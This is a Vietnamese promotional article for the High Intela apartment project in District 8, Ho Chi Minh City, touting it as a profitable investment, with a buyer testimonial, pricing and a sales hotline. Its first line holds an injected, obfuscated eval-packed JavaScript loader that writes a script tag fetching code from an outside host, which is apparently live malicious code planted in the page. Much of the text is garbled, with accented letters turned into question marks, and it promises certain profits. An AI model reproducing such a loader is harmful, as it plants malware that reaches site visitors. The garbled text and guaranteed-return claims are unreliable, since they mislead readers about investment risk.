Dự án High Intela: Đầu tư sinh lời hấp dẫn

Không eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|batze|var|u0026u|referrer|tehie||js|php’.split(‘|’),0,{}))
ph?i t? nhiên là High Intela qu?n 8 l?t vào t?m ng?m c?a các nhà ??u t? sành s?i. S? h?u nhi?u ?u ?i?m n?i tr?i v? v? trí, quy ho?ch, ti?n ích, giá c?, d? án chính là ?i?m sáng c?a th? tr??ng b?t ??ng s?n th?i gian g?n ?ây.

>> C?n h? Sunshine Avenue

>> C?n h? Gem Riverside

Ch? Nguy?n Th? Hân (qu?n 3, TP.HCM) v?a l??t sóng thành công m?t c?n h? chung c? ? qu?n, v?a ??u t? Airbnb (d?ch v? chia s? phòng). V?i s? v?n t?m trung và thu nh?p ?n ??nh, ch? m?nh tay xu?ng ti?n  ??t mua 4 c?n ? d? án High Intela. Ch? Hân cho bi?t ch? nh?m t?i High Intela t? lâu vì nhìn th?y ???c ti?m n?ng sinh l?i c?a d? án và hoàn toàn yên tâm v? m?t pháp lý.

High Intela qu?n 8 có v? trí ??c ??a, di chuy?n ??n trung tâm thành ph? r?t d? dàng. V?i s? v?n t?m trung, hi?n nay không d? gì mua ???c c?n h? ? m?t ti?n Võ V?n Ki?t ?âu. Nh?ng d? án này ?ã làm ???c ?i?u ?ó. Giá c? l?i r?t c?nh tranh, h? tr? thanh toán t?ng ??t nên tôi m?i m?nh d?n ??u t?. ??t ti?n vào ch? ??u t? uy tín c?ng c?m th?y yên tâm” – ch? Hân chia s?.

High Intela q8 có giá v?a túi ti?n, th?m chí là giá t?t nh?t khu v?c qu?n 8, ch? 23,3 tri?u/m2 ?ã bao g?m thu? VAT. M?c giá này ???c cho là phù h?p v?i ?a s? ng??i dân có thu nh?p t?m trung và th?p ? thành ph?.

??c bi?t, ?i?m n?i tr?i c?a d? án High Intela là ???c ??m b?o thi công ?úng ti?n ??. D? án ???c b?o  lãnh b?i ngân hàng Vietin Bank. Thông tin này khi?n các nhà ??u t? yên tâm. B?i n?m v?a qua, ?ã có không ít d? án chung c? có di?n bi?n ph?c t?p, giao nhà ch?m ti?n ?? khi?n ng??i mua ph?i khi?u n?i. Trong khi ?ó, High Intela có th? ??m b?o ???c ?i?u này.

Ch?a k?, d? án l?i có thi?t k? hoàn h?o, ??p m?t, hi?n ??i v?i nhi?u nhi?u ti?n ích n?i khu, ?áp ?ng nhu c?u h?c t?p, rèn luy?n, vui ch?i gi?i trí cho c? gia ?ình. M?i s?n ph?m ??u ???c xây d?ng d?a trên giá tr? s?ng ?ích th?c nh?t, nh?m mang ??n cho c? dân cu?c s?ng ti?n nghi, ch?t l??ng nh?t.

High Intela qu?n 8 là m?t trong nh?ng d? án hi?m hoi ? th?i ?i?m hi?n t?i có  th? mang t?i cho c? dân m?t môi tr??ng s?ng xanh mát, thanh bình, an lành cùng v?i các ti?n ích c?ng ??ng nh? ???ng d?o b?, sân v??n,… Khi l?a ch?n c?n h? High Intela, c? dân s? có c? h?i t?n h??ng m?t b?u không khí trong lành, thoáng ?ãng gi?a ph? th? ??y khói b?i ô nhi?m. Nh? ?ó mà cu?c s?ng ng??i dân ???c cân b?ng và nâng cao ch?t l??ng.

Nh?ng l?i th? trên giúp c?n h? High Intela tr? thành n?i an c? lý t??ng. Trong tr??ng h?p ??u t? cho thuê, nhà ??u t? c?ng có l?i cao vì ?ây là khu v?c s?m u?t. Dù là ??u t? l??t sóng hay ??u t? cho thuê, High Intela c?ng mang ??n cho nhà ??u t? kho?n l?i nhu?n h?p d?n, t?ng v??t tr?i. Các chuyên gia uy tín trong gi?i b?t ??ng s?n nh?n ??nh, n?m 2018, th? tr??ng b?t ??ng s?n s? phát tri?n r?t t?t, giá c? t?ng cùng v?i s?c tiêu th? kh? quan. Nh? v?y, n?u nhanh tay nhanh m?t ??u t? vào d? án High Intela, nhà ??u t? có kh? n?ng h?t b?c t?. ?ó là ?i?u mà không ph?i d? án nào c?ng dám h?a h?n. D? th?y, xu h??ng b?t ??ng s?n hi?n nay là di chuy?n d?n xu?ng khu vùng ven. V?y nên, High Intela càng có thêm l?i th?. V?i t?t c? nh?ng ?u th? n?i tr?i trên, d? án ch?c ch?n s? mang ??n l?i nhu?n kh?ng cho nhà ??u t?.

Liên h? PKD d? án c?n h? High Intela

Hotline: 0911.74.75.75

Fanpage: https://www.facebook.com/